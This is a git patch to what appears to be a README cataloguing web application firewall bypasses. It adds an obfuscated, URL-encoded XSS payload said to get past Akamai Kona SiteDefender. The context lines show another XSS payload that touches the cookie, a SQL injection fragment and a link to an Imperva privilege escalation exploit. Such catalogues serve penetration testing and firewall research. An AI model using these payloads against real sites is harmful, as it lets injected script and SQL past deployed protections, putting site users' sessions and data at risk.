From 9fe48ee146d65f5e97b9e60b592afc90b72506f2 Mon Sep 17 00:00:00 2001 From: Pinaki <0xinfection@gmail.com> Date: Sun, 16 Jan 2022 00:21:06 +0530 Subject: [PATCH] Added new akamai bypass (#15) --- README.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/README.md b/README.md index 12cd1e8..7a50a1b 100644 --- a/README.md +++ b/README.md @@ -3663,6 +3663,10 @@ stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS - [Imperva SecureSphere <= v13 - Privilege Escalation](https://www.exploit-db.com/exploits/45130) by [@0x09AL](https://www.exploit-db.com/?author=8991) ### Kona SiteDefender +- [XSS Bypass](https://twitter.com/XSaadAhmedX/status/1482398313227948034) by [@SaadAhmed](https://twitter.com/XSaadAhmedX) +``` +%3Cmarquee%20loop=1%20width=%271%26apos;%27onfinish=self[`al`+`ert`](1)%3E%23leet%3C/marquee%3E +``` - [XSS Bypass](https://twitter.com/h1_kenan/status/1185826172308983808) by [@h1_kenan](https://twitter.com/h1_kenan) ``` asd"on+<>+onpointerenter%3d"x%3dconfirm,x(cookie)